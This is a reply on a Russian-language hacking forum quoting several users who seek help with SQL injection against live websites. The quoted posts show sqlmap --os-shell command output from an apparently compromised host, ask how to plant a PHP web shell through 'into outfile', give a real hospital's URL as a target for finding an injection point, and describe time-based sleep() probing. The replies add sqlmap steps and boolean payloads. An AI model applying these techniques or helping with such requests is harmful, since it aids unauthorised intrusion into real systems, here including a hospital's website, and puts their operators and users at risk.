07.10.2019, 02:34
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от noppathee
↑
sqlmap с параметром --os-shell такой результат:
os-shell> whoami
do you want to retrieve the command standard output? [Y/
[11:11:38] [INFO] retrieved: nt authority\network servic
command standard output: 'nt authority\network service'
os-shell>
Подскажите нубу плз, как дальше действовать, чтобы залить шелл через sqlmap?
Нашел в теме рекомендацию от BigBear по похожему вопросу: select '' into outfile '/[full_path]/x.php';
Но как узнать конечную директорию, в которую заливаться?
Спасибо!
sqlmap --os-shell -> 4 -> 2 итд
Сообщение от DezMond™
↑
help!
Код:
https://www.clemenshospital.de/unternehmen/presse-und-aktuelles/pressemitteilungen/pressemitteilung/?cHash=3e1a0675b9b0455db1168f0342035939&tx_browser_pi1%5Bsort%5D=tx_browser_pi1%5Bsort%5D=a
Задетекти место инъекции
Сообщение от man474019
↑
in target when try sleep() target loads and gives response 504 Gateway Time-out, also tested sleep(5), sleep(10) and etc.., same result (504)
scanners detects it sql injection, but sqlmap not
what means it vuln ? thanks in advance
p.s server is nginx
or 1=1; or 1=2; and etc
|
|
|